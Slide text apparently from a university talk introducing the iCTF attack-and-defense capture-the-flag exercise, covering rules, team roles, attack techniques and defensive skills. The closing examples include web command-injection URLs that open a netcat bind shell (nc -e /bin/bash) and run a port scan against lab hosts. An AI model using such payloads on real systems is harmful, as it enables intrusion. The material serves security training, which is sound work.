CAPTURE THE FLAG Introductions beer brew man dutchrowboat.

CAPTURE THE FLAG

Introductions

beer brew man

dutchrowboat

Teams

Firewall IDS/IPS Services – Attack and Defense

PHP, Perl, Ruby, Python, Java Analysis

Wireshark, etc. C/ASM Operating System

Apache, OS Configuration, etc.

iCTF

Came from Defcon iCTF ran by UCSB No test required – just edu “Largest existing live security exercise”

Test Skills of understanding security

What is it?

A variety of Internet enabled services Services comprised of:

PHP Perl Shell Scripts C++ MySQL Apache/lighttpd SSH XML RPC FTP

What to do

All services should be protected Patch IPS/IDS

All services should be attacked

Blender

SNAT with weights?

Is it real?

Rules

No DOS All traffic is penalized Must stay on internal network

Don't prevent legitimate traffic

Don't break rules If attack service, don't launch DOS

from compromised machine

2005 Defcon – hack the scorebot

Attack Techniques

• Buffer overflows • Format string attacks • Shell attacks • Race conditions • Misconfigurations • Authentication attacks • Web-based attacks

Directory traversal Cookie-based services Cross-site scripting Server-side applications

• Lack of parameter validation (e.g., SQL injection)

Skills Scanning • Firewalling • Intrusion Detection • Vulnerability analysis • For each type of vulnerability

How to identify a vulnerability How to exploit a vulnerability How to patch a vulnerability

(without disrupting the get/set flag methods) How to detect a vulnerability

• For each service How to monitor the requests to a service How to monitor the execution of a request Protocol security analysis Application security analysis

Vigna's Suggestions

Have a structured team with clear responsibilities The Perl/Python/PHP group The SQL/database group The flaw-finder group The firewall group The IDS group The C-based exploit group

• Have a leader responsible for coordination and integration • Have a way to intercept socket connections and apply

regexes/substitutions • Have vulnerability analysis tools handy • Have a “human IDS” • Remember: the game lasts only a few hours

Not the first time…

2009

Questions?

http://athena.uccs.edu/ictf

Backups…

Test Network

Real Network

Image 10.10.1.2

10.10.1.3Vuln

10.10.1.4Team

Hub

Team Box10.10.1.1

Mon Box10.10.1.x

AttackBoxes

Console for Fixes

Image Test Box

VulnPatch Test

VulnAttack Box

UCCSBoxes

UCCSBoxes

Some Examples

echo GET / | nc 10.110.134.123 80 > ./myoutput.txt

http://10.100.134.77/users/url3@l.php?command=nc -lp 1337 -e /bin/bash

http://10.100.134.77/users/url3@l.php?command=nmap -p 1-65535 10.120.134.222 > port.txt